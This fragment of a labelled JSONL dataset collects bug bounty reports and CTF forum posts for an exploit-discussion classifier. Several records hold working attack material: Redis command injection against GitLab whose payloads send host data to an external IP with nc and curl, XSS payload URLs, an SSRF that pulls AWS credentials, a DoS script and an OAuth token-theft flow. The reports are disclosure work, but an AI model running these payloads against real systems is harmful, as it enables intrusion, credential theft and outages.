"val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8d5b935a0b9d1d32ce87", "text": "[Cross-site Scripting (XSS) - DOM] HTML injection in title of reader view\n\n## Summary:\n\nReader.html in Brave doesn't escape/trim HTML tags in %READER-TITLE%.\nhttps://github.com/brave/brave-ios/blob/development/Client/Frontend/Reader/Reader.html#L17\nThis allows any page to inject malicious HTML code in reader-mode page through `{html code you want to inject}`.\n\n## Products affected: \n\nBrave iOS Version 1.20 (20.09.11.20), also current Nightly\n\n## Steps To Reproduce:\n\n* Open the following Google docs: https://docs.google.com/document/d/10kPw7PNOujlenF08i3jBgD4zqoG5148u8TRkoHj7io8/edit?usp=sharing\n* Push reader-mode button shown in address bar.\n* Malicious login form is rendered instead of the document\n* Fill the form, then the user/password you filled are stolen to malicious website\n\n## Supporting Material/References:\n\n * See attached movie file for the demonstration\n\n## Impact\n\nMalicious web contents can inject HTML code and manipulate readerized page (hosted in localhost:65XX).\n\nAlso, if injected HTML code contains a string `%READER-CONTENT%`, it is replaced to the original page contents.\nhttps://github.com/brave/brave-ios/blob/87af4cbf0474bafd13673690aeee0c11059fbba2/Client/Frontend/Reader/ReaderModeUtils.swift#L29\n\nSo, attacker can steal user's sensitive information contained in the original HTML page through `
`.\nWhen you open the following Google search link in reader-mode, you can reproduce the above scenario as well.\nhttps://www.google.com/search?q=%3Cform%3E%3Ctextarea%20name%3D%22dom%22%3E%25READER-CONTENT%25%3C%2Ftextarea%3E%3Cinput%20type%3D%22submit%22%3E%3C%2Fform%3E", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6e447be7cd4d41e1dd39", "text": "LOL, what a Dumbo I am. Several days stuck with the task…just because I did not understand the task properly. So, save your time if you are stuck too. Disassemble, loop, iterate through RDX and save all results of the looping…and then just delete 0x and join the bytes together. No switching around. Just load it, run it and you will see the value you are looking for. Its straigthforward, not a trap.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-11-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b5c27b13b58a69e99fdf", "text": "[Unknown] [python]: Add some dangerous sinks for paramiko ssh clients\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1217604f470cecff20b0", "text": "[Unknown] CVE-2021-38314 @ https://www.mtn.co.rw\n\n## Summary:\nHello.\nI your domain https://www.mtn.co.rw was vulnerable to CVE-2021-38314\n\n##Description:\nThe Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s AUTH_KEY concatenated with the `SECURE_AUTH_KEY`.\n\n\n##Referrence:\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314\nhttps://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/\n\n\n## Steps To Reproduce:\nVisit https://www.mtn.co.rw/wp-admin/admin-ajax.php?action=136454233f7f7b567bf1310154c66f11 you will see ```893c4010bb377e5d41600958db3f8e17```\n\n## Supporting Material/References:\n{F1461742}\n\n## Impact\n\nCVE-2021-38314 \n\nThank you\n@aliyugombe", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2021-38314"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "05a8c421ada4d4f096a9", "text": "[Unknown] PYTHON: CWE-079 - Add query for email injection\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d76c8bf7610d783b993e", "text": "[Content Spoofing] Potential Spoofing Risk through Firefox Private Relay Service\n\n** Note: This is a duplicate of Bugzilla Report Bug ID: 1755749.**\n\n\nThe problem: adversaries can leverage Firefox’s Relay service to send spoofing emails to users. The current Relay design increases the chance for the spoofing emails to reach the target inbox that would be otherwise blocked.\n\nRoot causes:\n(1) The forwarding system re-composes the entire email with a new HTML template and also re-writes the “From:” header as “@relay.firefox.com”. This removes/invalidates the signatures of DKIM and ARC headers.\n\n(2) “@relay.firefox.com” and the IP of Firefox Relay have a high reputation, which bumps the trust of the forwarded spoofing emails. For these two reasons, a spoofing email that would otherwise be blocked (or placed into the spam folder) can enter the user's inbox.\n\nProof-of-concept:\n\nStep 1: Pick a spoofing target domain. We tried domains with different DMARC policies: “none”, “quarantine”, and “reject”. All three cases worked. Specifically, we tested spoofing targets as “illinois.edu”, “usenix.org”, and “nicehash.com”\n\nStep 2: Craft a spoofing email with the forged “From:” in the header\n\nStep 3: Send the email to the “Firefox Relay” victim address\n\nThe email enters the target user's inbox, without any warnings as long as the email is successfully delivered to @relay.firefox.com SMTP server.\n\nWe noticed that even when the spoofed domain has DMARC=reject (i.e., nicehash.com), Firefox Relay will forward the emails. The modified emails can then enter the user's inbox. See the screenshot attached (our forged login notification from nicehash.com).\n\nOur Recommendations:\n(1). Relay should perform authentication and drop emails with failed DMARC (especially for sender policy=“reject”).\n(2). Relay should perform ARC validation and sealing to maintain the integrity of the ARC chain.\n(3). By default, Relay should not modify the original email, nor re-composing a new one with Firefox's template && forwarded content.\n\nExplanations: if the incoming email has DKIM, because of (3), the DKIM signature will still be valid when the email reaches the receiver, which makes DMARC pass (i.e., no harm on deliverability). If the incoming email does not have DKIM but has SPF, the above recommendations might hurt deliverability when (a) the sender’s DMARC policy is “reject”/“quarantine” and (b) SPF=“pass” at the relay. Under this condition, the relay may consider modifying “From” to ensure deliverability. In this case, because SPF is “pass” at the relay (i.e., email authenticity is verified), modifying “From” does not introduce additional risks to the receiver. If the incoming email does not have DKIM or SPF, the above recommendations also do not hurt deliverability.\n\nBest regards,\n\n## Impact\n\nAdversaries can leverage Firefox’s Relay service to send spoofing emails to users. The current Relay design increases the chance for the spoofing emails to reach the target inbox that would be otherwise blocked.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ea9f44b426974ccc3367", "text": "[OS Command Injection] RCE via github import\n\nHello,\n\nWhile continuing mining on [github import](https://hackerone.com/reports/1665658), I found a vulnerability on gitlab.com allowing to execute remotely arbitrary commands.\n\nGitlab uses Octokit to get data from github.com. Octokit uses [Sawyer::Resource](https://github.com/lostisland/sawyer/blob/master/lib/sawyer/resource.rb) to represent results.\n\nSawyer is a crazy class that [converts](https://github.com/lostisland/sawyer/blob/f5f080d5c5260e094069139ffc7c13d0acba4ab5/lib/sawyer/resource.rb#L81) a hash to an object whose methods are based on the hash's key:\n\n```ruby\nirb(main):641:0> Sawyer::VERSION\n=> \"0.8.2\"\nirb(main):642:0> a = Sawyer::Resource.new( Sawyer::Agent.new(\"\"), to_s: \"example\", length: 1)\n=> \n{:to_s=>\"example\", :length=>1}\n...\nirb(main):643:0> a.to_s\n=> \"example\"\nirb(main):644:0> a.length\n=> 1\n```\n\nGitlab uses directly the responded Sawyer object in few functions, such as, the `id` variable in [this function](https://gitlab.com/gitlab-org/gitlab/-/blob/99f5db917a33ad9466f35918a1da454ed397be8e/lib/gitlab/github_import/parallel_scheduling.rb#L145):\n\n```ruby\n def already_imported?(object)\n id = id_for_already_imported_cache(object)\n\n Gitlab::Cache::Import::Caching.set_includes?(already_imported_cache_key, id)\n end\n```\n\nNormally, `id` should be a number. However when `id` is `{\"to_s\": {\"bytesize\": 2, \"to_s\": \"1234REDIS_COMMANDS\" }}`, we can inject additional redis commands by using `bytesize` to limit the previous command when it [is constructed](https://github.com/redis/redis-rb/blob/v4.4.0/lib/redis/connection/command_helper.rb#L8) (although the `bytesize` is `2` we need to reserve 4 bytes as 2 additional bytes for CLRF):\n\n```ruby\n def build_command(args)\n command = [nil]\n\n args.each do |i|\n if i.is_a? Array\n i.each do |j|\n j = j.to_s\n command << \"$#{j.bytesize}\"\n command << j\n end\n else\n i = i.to_s\n command << \"$#{i.bytesize}\"\n command << i\n end\n end\n```\n\nAs we can execute any redis commands, we can escalate to execute any Bash command by using an existing gadget, for example:\n\n```\nlpush resque:gitlab:queue:system_hook_push \"{\\\"class\\\":\\\"GitlabShellWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"open(\\'| (hostname; ps aux) | nc 51.75.74.52 11211 \\').read\\\"],\"queue\\\":\\\"system_hook_push\\\"}\"\n```\n\nI tested this redis command first on my own gitlab instance and it worked. \n\nI then tested on gitlab.com but got nothing. I tried another by replacing basically `nc` by `curl` but no luck:\n\n```\n lpush resque:gitlab:queue:system_hook_push \"{\\\"class\\\":\\\"PagesWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"IO.read('|(hostname; ps aux) | curl 51.75.74.52:11211 -X POST --data-binary @- ')\\\"], \\\"queue\\\":\\\"system_hook_push\\\"}\"\n```\n\nAlthough the gadget above works well on my local instance but gitlab SaaS which may be protected somehow or used another redis namespace for Sidekiq, even another redis instance. So I used then the basic redis command `REPLICAOF 51.75.74.52 11211\\n\\n` to test gitlab.com and I got a ping from your redis server to my server `nc -vlkp 11211`:\n\n{F1871024}\n\nThis means that I have the full control on the redis. After seeing the pings, I immediately turned off the replication by executing the redis command `REPLICAOF no one\\n\\n`. No information from your redis server has been replicated to mine as I used `nc` and I got only the `ping` messages.\n\n\nBy checking on my local instance at `/var/opt/gitlab/redis/redis.conf`, I see that only `keys` command is disable. I did not try `FLUSHALL` to write data to file as it is too dangerous.\n\nAs gitlab uses redis as a cache storage, so I tried to reach RCE via `Marshal.dump` method. I tested the following payload on gitlab.com to poison the avatar of my project via the key `cache:gitlab:avatar:yvvdwf/xss:16210710`:\n\n```\n\\r\\n*3\\r\\n$3\\r\\nset\\r\\n$39\\r\\ncache:gitlab:avatar:yvvdwf/xss:16210710\\r\\n$347\\r\\n\\u0004\\b[\\bc\\u0015Gem::SpecFetcherc\\u0013Gem::InstallerU:\\u0015Gem::Requ", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bf4ea2b7d3e5973b1db4", "text": "Nmap-cheat-sheet\n\nA very nice help using nmap. StationX – 1 May 20 Nmap Cheat Sheet Example IDS Evasion command", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-04-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e8a0fbb4289821a7c219", "text": "[Improper Access Control - Generic] One-click account hijack for anyone using Apple sign-in with Reddit, due to response-type switch + leaking href to XSS on www.redditmedia.com\n\nHi,\n\n# Description\n\nI've been researching new ways to steal OAuth codes and access-tokens using postMessage, and I found a way for me to steal the code and/or access-token from Apple-sign-in on reddit.com allowing a full account hijack of the account in Reddit.\n\nThe way it works is this:\n\n1. Attacker prepares a `state`-parameter in its own browser from the regular Apple sign-in flow in Reddit. This is an important part on how we get the code.\n2. Attacker makes a page for the victim with the attacker's state attached to it. The page loads an iframe with `www.redditmedia.com`, which is an intentional sandbox but with a fun quirk, it uses `window.name` of the frame to pass over query parameters for the current URL in the main window of Reddit. This also includes fragment, which is what we need to get the tokens.\n3. The javascript in the www.redditmedia.com sandbox will create a link to Apple sign-in for Reddit, but tainted with the `state`-value that the attacker set. Also, the `response_type` is modified from `code` to `code+id_token` and the `response_mode` to `fragment`. This is the second important part why we can steal the code, since Reddit uses `response_mode=web_message` live, to get the message as a postMessage from the login popup, but the other response modes in Apple-ID are not disabled by Reddit. **Reddit is not expecting to get any sensitive tokens in the URL fragment.** Also, the `redirect_uri` set in the OAuth-application in Apple for Reddit is allowing `https://reddit.com` only as the return page. This is something you need to remove, or point elsewhere. When you're using `response_mode=web_message`, the `redirect_uri` doesn't really matter what it is set to, since the whole origin of `https://reddit.com` will be allowed to get the postMessage. But since we now can direct the tokens to Reddit's main page, we have the iframe of www.redditmedia.com there to catch the tokens.\n4. Victim clicks the link from the attacker page, will go through \"sign-in with Apple\" for Reddit, but with the attacker's `state`-parameter. When the login process is completed, the URL of the main page becomes `https://reddit.com/#state=xxx&code=xxx&access_token=xx`.\n5. The XSS on `www.redditmedia.com` in the first window, which has the same domain as the iframe, will be allowed to ask about the `window.name` of the iframe in the main window, since it's the same origin as the iframe on the attacker's page. It will then be able to steal the current URL that has the tokens in it.\n\nHere's a video to show the flow, as you will see in the beginning - the attacker has the red profile in Chrome. He will open his own session with Apple and copy the state to the attacker-page, and then send the link to the victim (in the gray profile of Chrome). When the code shows up on the attacker's page later, that's where the attacker then takes over again and uses its incognito browser window to sign in as the victim by posting the postMessage from his Apple-ID sign in popup to Reddit:\n\n{F1726830}\n\nAnd here's a link for testing:\n\n```\nhttps://fransrosen.com/reddit-hijack-424342.html\n```\n\n# Technical details\n\nHere's the HTML of the malicious page:\n\n```html\n\n\n\n\n\n\n
\n\n`\n\n## Suggested Mitigation/Remediation Actions", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2ca5a54b6fd37489a025", "text": "[Server-Side Request Forgery (SSRF)] SSRF via potential filter bypass with too lax local domain checking\n\n## Summary:\nHi.\nReviewing the code for filtering for ssrf, in `preventLocalAddress`, we can see that it calls the function `ThrowIfLocalAddress()`. It has three common checks, first, it checks if the string is `localhost`, or if it ends in `.local` or `.localhost`\n```php\n\t\t// Disallow localhost and local network\n\t\tif ($host === 'localhost' || substr($host, -6) === '.local' || substr($host, -10) === '.localhost') {\n\t\t\t$this->logger->warning(\"Host $host was not connected to because it violates local access rules\");\n\t\t\tthrow new LocalServerException('Host violates local access rules');\n\t\t}\n```\nSecond check, it checks if the provided url is only a host\n```php\n\t\t// Disallow hostname only\n\t\tif (substr_count($host, '.') === 0 && !(bool)filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6)) {\n\t\t\t$this->logger->warning(\"Host $host was not connected to because it violates local access rules\");\n\t\t\tthrow new LocalServerException('Host violates local access rules');\n\t\t}\n```\nLastly, it checks if the user input is an ip, if it is, it checks if it is not in the `FILTER_FLAG_NO_PRIV_RANGE`, or `FILTER_FLAG_NO_RES_RANGE`.\nThese checks lack something tho. Checks for metadata. Specifically the Alibaba metadata, and google cloud metadata. \nOther metadata like aws and digital ocean uses 169.254.169.25 which is included in the `FILTER_FLAG_NO_RES_RANGE`. Google cloud metadata tho, can be accessed with http://metadata.google.internal which is not in any checks from above. And the alibaba metadata can be accessed with `100.100.100.200`, this ip is neither in the `FILTER_FLAG_NO_PRIV_RANGE` or `FILTER_FLAG_NO_RES_RANGE` flags, also bypassing the check. \nThis make it vulnerable to ssrf when the nextcloud host is hosted with either google cloud or alibaba\n\n## Impact\n\nSSRF filter bypass", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e618cddf985723da7aad", "text": "[Uncontrolled Resource Consumption] DOS via issue preview\n\n### Summary\nPreviewing an issue with a specially-crafted description results in high CPU usage for 60 seconds (request timeout).\nMultiple requests can be issued in parallel to create a larger impact.\n\n### Steps to reproduce\n1. Given an authorized user (on GitLab.com - anyone can self-register. On EE - depends on instance configuration).\n2. Create an issue with the following description (provided a one-line python script to avoid bloating):\n3. Hit the preview button.\n\nSteps 2&3 can be accomplished via the preview_markdown API endpoint.\n\nThe script:\n```python -c \"print('![l' * int(1048576 / 3 - 1) + '\\n')\"```\nNote: this is essentially the maximal description size, but a smaller number of repetitions works too.\n\n### Impact\nAfter 60 seconds (timeout) - the request fails.\nMeanwhile, on the server end, (a single) CPU is burnt out (verified against a local EE instance).\nIssuing multiple requests in parallel results in multiple CPUs burn out.\nUsing the DockerHub image, the entire server is completely unavailable by repeatedly sending a small number of requests repeatedly.\n\n### Examples\nThe bug is instance-independent, works on latest versions. Since GitLab.com is open-core - it would work on GitLab too.\n\n### What is the current *bug* behavior?\nThe HTTP request fails for timeout while the server is burning CPU.\n\nOn the code side:\n```texts_and_contexts``` is being initialized here:\n\n```\ndef analyze(text, context = {})\n @texts_and_contexts << { text: text, context: context }\n end\n```\n\nIt is then used at banzai/reference_extractor.rb:\n```\ndef html_documents\n ...\n @html_documents ||= Renderer.cache_collection_render(@texts_and_contexts)\n ...\n```\n\nThe CPU utilization is found in the execution of ```cache_collection_render```.\n\n### What is the expected *correct* behavior?\nFix the implementation of ```cache_collection_render```.\n\n### Relevant logs and/or screenshots\n### Output of checks\n#### Results of GitLab environment info\n\n## Impact\n\nA complete denial of service of a GitLab EE instance.\nAs this vulnerability impacts GitLab.com, we assume that this vulnerability opens the door for a DDOS attack.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bcd641c93eb9f7ed77d0", "text": "[Improper Access Control - Generic] Disabling context isolation, nodeIntegrationInSubFrames using an unauthorised frame.\n\nDetails can be found in the following github advisory: https://github.com/electron/electron/security/advisories/GHSA-mq8j-3h7h-p8g7\n\n## Impact\n\nUsing a renderer exploit, context isolation and nodeIntegrationInSubFrames can be disabled, which enables an attacker to leak IPC module and communicate with the more privileged main process which might eventually lead to Remote Code Execution if there are sensitive IPC handlers on main process.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-08-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "595833d3e482715f0f46", "text": "[Phishing] Address Bar Spoofing on TOR Browser\n\nHi TOR team,\n\nI would like to report a security bug in your browser:\n\nStep 1: Goto http://www.ոokia.com/(http://jsbin.com/wuyikedaxi/1/edit?html,output)\nStep 2: Observe that address bar points to http://www.ոokia.com/ which actually to be pointing to http://xn--okia-zgf.com, however browser displays www.ոokia.com/\n\nActual results:\n\nAddress bar points to a spoofed domain http://www.ոokia.com/. Address bar fails to parse character \"ո\"(U+0578 Armenian Small Letter). Several other characters from Armenian family lead to the same effect. \n\nExpected results:\n\nTORbrowser should have resolved the domain to real http://xn--okia-zgf.com. On chrome, internet explorer and firefox it resolves to xn--okia-zgf.com.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ec6981f73b88d317ebfa", "text": "[Server-Side Request Forgery (SSRF)] SSRF in Functional Administrative Support Tool pdf generator (████) [HtUS]\n\n## Summary:\nI found that it is possible to inject a javascript payload during the PDF form creation process, which is then executed by the checklist application server.\n\n## Vulnerable Software: Functional Administrative Support Tool (FAST) v1.0\n\n## Intro: \n\n██████████\n\nAdministrative clerks create a dynamic action items by guiding a███ through targeted questions designed to draw out required administrative actions that are required and trigger of additional processes that need to be completed.\n\nAfter completing the question and answer process ( point 3. Get Action Items ) the application offers 2 options: Send the report by Email or print (See PDF).\n\nWhen the user clicks on (View PDF) they are redirected to the URL:███████/print/checklist/fast_session_XXXXXX.pdf . This is where the user will have access to his PDF form generated dynamically by the███ system.\n\nnote: XXXXXX is the \"session\" assigned by the system to identify a form.\n\n## Steps To Reproduce:\n1. Go to███/ and select \"BEGIN NEW SESSION\", enter a MCC code Ex. \"h99\" and SUBMIT\n2. with burp suite on, select a process, and fill in the data randomly up to point 3. (EDIPI code is a 10 chars long number. Ex. 0123456789) - click CONTINUE\n\n3. in point 3, (Get Action Items) click on PRINT (VIEW PDF) - A window will open with the dynamically generated PDF exposing the data that we complete.\n\n4. observe in burp suite the last request made to /api/save/ proceed to right click and send to \"Repeater\"\n\n5. modify value \"name\" of the json object \"globalInfo\" by the payload:\n\n``\n\nand click Send request. If everything went well, the server responds \"status ok\"\n\n6. Refresh form URL. Ex.████████/print/checklist/fast_session_XXXXXX.pdf\n\nfor this PoC. AWS secretkeys were accessed:\n\n`{ \"Code\" : \"Success\", \"LastUpdated\" : \"2022-07-06T02:57:53Z\", \"Type\" : \"AWS-HMAC\", \"AccessKeyId\" : \"███\", \"SecretAccessKey\" : \"████\", \"Token\" :\"██████\", \"Expiration\" : \"2022-07-06T09:04:49Z\"}`\n\n## Supporting Material/References:\n\n* https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/\n* https://docs.google.com/presentation/d/1JdIjHHPsFSgLbaJcHmMkE904jmwPM4xdhEuwhy2ebvo/htmlpresent\n* https://hackerone.com/reports/508459\n* https://hackerone.com/reports/53088\n\n## Impact\n\nAn attacker can inject malicious javascript payloads in the PDF generation process and executed by the checklist application server. An attacker could use this to Steal credentials or other sensitive information from ████ AWS Instance.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bc6f661fb87ec20a76d9", "text": "[Insufficient Session Expiration] Broken Authentication Session Token Bug\n\nHi Team \nHope your are good I have found a broken authentication issue in https://www.trycourier.app\n\nSteps to reproduce \n\n1. Create a courier account or use existing one.\n2. Confirm Your email address.\n3. Now log out from your account and request for password reset code for your account .\n4. Don't use the code that has been sent to your email address.\n5. In new tab or new browser log in back to your account.\n6. Go to account setting and change your password .\n7. Now go to email and check the password reset code that we requested in step 3.\n8. Change Your password using that reset password code .\n9. You can see that your password has been changed.\n\nThe reset code is not expired after changing the password\n\n## Impact\n\nIf the site has a token issue, The result is the reset password token in the Step 3 is still usable and did not expire yet. \nIf the victims opens his mail in cybercafe or in attackers device and forgot to log out then attacker can access that system and can reset the password of his account.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "249de022f03000074424", "text": "[Cross-site Scripting (XSS) - Reflected] xss reflected - pq.tva.com\n\nPOC: \n\nhttps://pq.tva.com/siteminderagent/forms/smpwservices.fcc?USERNAME=\\u003cimg\\u0020\nsrc\\u003dx\\u0020onerror\\u003d\\u0022confirm(document.domain)\\u0022\\u003e&SMAUTHREASON=7\n\n## Impact\n\nWith the help of xss a hacker or attacker can perform social engineering on users by redirecting them from real website to fake one. hacker can steal their cookies and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "5d8f8e56fd5474c4710e", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS - in Email Input\n\n**Target Url**\nhttps://█████\n\n**Summary:**\nHello, I found a reflected xss injection in the email input when updating user profile. Seems Email input is not sanitized and the special characters are not encoded.\n\n**xss payload used**\n\">\n\n## Step-by-step Reproduction Instructions\n\n1. Navigate to the target url `https://███/█████/` and login.\n2. Then go to `My Profile`.\n3. Set any password. In Email input, add the payload next to the email.\nExample `your_email@gmail.com\">`\nThen click save.\n\nSee this POST Request\n```\nPOST /██████/edit_profile/ HTTP/1.1\nHost: ████████\n\nREQUEST HEADER HERE\n\n-----------------------------191691572411478\nContent-Disposition: form-data; name=\"action\"\n\nsave_info\n-----------------------------191691572411478\nContent-Disposition: form-data; name=\"password[original]\"\n\nNEWPASSWORD\n-----------------------------191691572411478\nContent-Disposition: form-data; name=\"password[confirmed]\"\n\nNEWPASSWORD\n-----------------------------191691572411478\nContent-Disposition: form-data; name=\"email[original]\"\n\n███████\">\n-----------------------------191691572411478--\n```\nAnd an Alert will pop up ;)\n█████████\n\n## Suggested Mitigation/Remediation Actions\nSanitize input fields or encode/escape special characters to avoid xss.\n\n## Impact\n\nAn attacker can execute malicious javascript codes on the target application.\n\nHope this is not duplicate :|", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0b0cf9e1151f5413b319", "text": "Thanks so much for the help @chappyroo . This is essential for step 5 - some of these tasks are awful!", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-10-31", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8251ef5fb274e1c081f7", "text": "[User Interface (UI) Misrepresentation of Critical Information] Possible to spoof Origin in \"Connected Sites\"\n\nHi MetaMask Team!\n\nI have been experimenting with trying to spoof the origin of the site that is trying to interact with MetaMask. Being able to recognize the origin is an important mechanism in the Web3 ecosystem, because signing anything from a malicious origin could result a loss of funds for example. \n\nI have found that it is possible to partly spoof the origin in the `Connect Sites` menu , which seems to be caused by a bit of CSS that sets the origin domain name direction to [\"right-to-left\"](https://www.w3schools.com/cssref/pr_text_direction.asp)\n\n## Reproduction\n\n1. Install the latest MetaMask Chrome Extension (10.18.4) in the latest Chrome version (105.0.5195.127).\n2. Navigate to https://0-a.nl/metamask23rh23f923f.html\n3. Accept the request to connect to 0-a.nl\n\n████ █████\n\n4. Sign the message (although I believe this is not necessary)\n\n{F1948691}\n\n5. Open the Extension again and click `Expand view`\n\n{F1948694}\n\n6. Click the 3 dots and then `Connected Sites`\n\n{F1948696}\n\n## Result\n\nWhat we see now is that not `0-a.nl` is shown as a connected site but `a.nl-0`\n\n{F1948697}\n\n## Vulnerable code:\n\nThis behavior is caused by the fact that our domain name starts with a number and is followed by a hyphen, in combination with the following style sheet:\n\nhttps://github.com/MetaMask/metamask-extension/blob/753666d9c2a0cb2be89e885629dfa6f3ded5703b/ui/components/ui/site-origin/index.scss#L21\n```\n direction: rtl;\n```\n\nThis specific combination of \"English\" letters, numbers and hyphens and the \"right-to-left\" direction in the stylesheet, will cause for the order of the characters in the domain name to be messed up, displaying an incorrect domain name.\n\n## Exploitation\n\nI understand `a.nl-0` is a weird looking domain and might cause some suspicions. But to demonstrate more impact we will pretend I own the domain:\n`4-metamask.io` or more specifically the subdomain https://10.18.4-metamask.io\n\nI didn't purchase this domain so to simulate this, go back to step 6 from the reproduction.\n\nRight click the `a.nl-0` and select `Inspect Element`. Select the line saying `0-a.nl` and replace it with `10.18.4-metamask.io`. **To emphasize, this is not self-exploitation, we merely do this so we don't need to buy the `4-metamask.io` domain to POC this.**\n\nNow go back to the browser tab and the result should look like this:\n\n{F1948706}\n\nWe now spoof the domain metamask.io and use the version number to distract from the fact that a hyphen follows the .io TLD.\n\n## Impact\n\nConnecting to a website allows that website to see your MetaMask wallet address and balance, and send transaction approval requests etc. For privacy and safety concerns you might want to disconnect your MetaMask wallet from a malicious website.\n\nAs seen in Steps 3 and 4, initially we are not able to spoof the origin in the MetaMask popups. However even if you took those steps by mistake, it should be easily identifiable which website to \"Disconnect\" should you want so to. \n\nWhat I've demonstrated in this POC is that we can register a similar looking domain and make it difficult for the victim to distinguish which website to Disconnect from their wallet, with our domain hiding in plain sight. \n\nLike stated in my introduction, the mechanism to manually recognize which Origin is making requests to Metamask is a vital part of the Web3 ecosystem and a secure implementation of the screens to accommodate this should be caried out to all the applicable user interfaces.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e4a53112e63421358d24", "text": "[Unknown] HTML Injection in E-mail\n\nHello Gents,\n+ While testing \"account.acronis.com\", I found that \"first name\" could be injected with HTML tags while sending an email invitation. But this attack requires user interaction to confirm the email first, then he/she will receive a welcome email \"Welcome to your Acronis Cyber Protect trial!\" Contains the injected payload!\n\n### Steps to Reproduce:\n1. Please register at https://www.acronis.com/en-us/products/cyber-protect/trial/#registration with the victim's email.\n2. Inject \"First Name\" field with HTML tags, for example: `\"/>login`.\n3. Check the email inbox, HTML tags will be executed. \"Your Acronis Cyber Protect trial starts today!\"\n\n### Proof of Concept:\n+ {F1687466}\n\n## Impact\n\nHTML Injection", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e16b652977f4b3ea8f00", "text": "[Path Traversal] process.binding() can bypass the permission model through path traversal\n\n**Summary:** process.binding('fs') bypassed the permission model validation against path traversal\n\n**Description:** process.binding('fs') can be used to bypass the path traversal validation for the permisison model\n\n## Steps To Reproduce:\n\nCreate the following index.js and store at `/home/pathtraversal/`\n```js\n// index.js\nconst fs = process.binding('fs')\n\nfs.mkdir('/home/pathtraversal/../test0', 511, false, null, null)\n```\n\n```console\n$ 